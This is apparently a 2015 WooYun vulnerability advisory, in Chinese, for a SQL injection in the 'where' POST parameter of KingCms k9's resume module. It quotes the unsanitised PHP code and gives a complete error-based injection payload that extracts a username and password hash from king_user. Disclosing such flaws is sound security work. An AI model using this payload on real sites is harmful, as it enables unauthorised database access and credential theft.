当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101787

漏洞标题:KingCms最新版(k9)注入1枚

相关厂商:KingCms

漏洞作者: 路人甲

提交时间:2015-03-18 10:07

修复时间:2015-05-02 10:08

公开时间:2015-05-02 10:08

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

KingCms最新版(k9)注入1枚

详细说明:

朋友的公司想购买kingcms的授权,让我帮忙看下。发现kingcms很长一段时间没更新了,憋了一段时间放出了最新版的k9(2014-12-13更新),官网下下来学习一下。
在wooyun上看到了几个漏洞,如: WooYun: kingcms最新版sql注入漏洞
注入点:POST /apps/jianli/index.php HTTP/1.1
注入参数:where 问题文件在/apps/jianli/index.php

function _create(){
$u=new user;$u->auth_role('jianli');
$db=new db;
$cmd=kc_get('cmd',array('categroy','content'));

$file=new file;
if($cmd=='content'){
$where=kc_get('where',0,1);
$pid=kc_get('pid',2,1);
$rn=kc_get('rn',2,1);
$limit=($rn*($pid-1)).','.$rn.';';
$pcount=kc_get('pcount',2,1);
$start=$rn*$pid>$pcount?$pcount:$rn*$pid;
$res=$db->getRows('%s_jianli','*',$where,'',$limit);
foreach($res as $rs){
//process file to rela path
$rs['TEMPLATE']='jianli/info.php';
$file->create($rs['url'],$rs,'apps/jianli/_info.php');
}
}else if($cmd=='categroy'){
//遍历地区
$node=new node;
$types=$node->getRows('work_type');//$db->getRows('%s_node','url,name','cid=6');
//$areas=$db->getRows('%s_node','url,name','cid=1');
//遍历分类
foreach($types as $t){
$fpath=kc_config('jianli.dir').$t['url'].'/';//"{$a['url']}_{$t['url']}/";
$array=array(
'title'=>"所有(".$t['name'].'类)个人简历',
'name'=>$t['name'],
'where'=>"status=1 and online=1 and type='{$t['url']}'",
'type'=>$t['url'],
'TEMPLATE'=>'jianli/categroy.php',
);
$file->create($fpath,$array);
}
$start=1;$pcount=1;
}

$js="\$.kc_progress('#progress_{$cmd}',{$start},{$pcount});";
$js.=$start==$pcount ? "\$('.Submit').removeAttr('disabled');":"\$.kc_ajax({URL:'".FULLURL."apps/jianli/index.php',CMD:'create',cmd:'$cmd',where:'$where',pid:".($pid+1).",rn:{$rn},pcount:{$pcount}});";
kc_ajax(array('JS'=>$js));
}


$_POST['where']没有经过处理就进入了$db->getRows,去看看$db->getRows

public function getRows($table,$insql='*',$where=null,$order=null,$limit=null,$group=null) {
$table=str_replace('%s',DB_PRE,$table);
$sql="SELECT $insql FROM $table ";
$sql.= empty($where) ? '' : " WHERE $where";
$sql.= empty($group) ? '' : " GROUP BY $group";
$sql.= empty($order) ? '' : " ORDER BY $order";
$sql.= empty($limit) ? '' : " LIMIT $limit";
return $this->get($sql);
}


在执行sql语句之前,也没有过滤,这里就造成了注入。
Kingcms可以报错,因此
Payload:

jsoncallback=1&_=11&URL=http%3A%2F%2Flocalhost%2Fapps%2Fcontent%2Fcategroy.php&CMD=create&TID=1&AJAX=1&USERID=10000&SIGN=89ee81f5f1f328f555ceb7e7655d9f2f&pid=1&rn=2&cmd=content&pcount=1&where=0 UNION SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,userpass)FROM king_user LIMIT 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a%23


注入成功,见下图

成功副本.jpg

漏洞证明:

见 详细说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝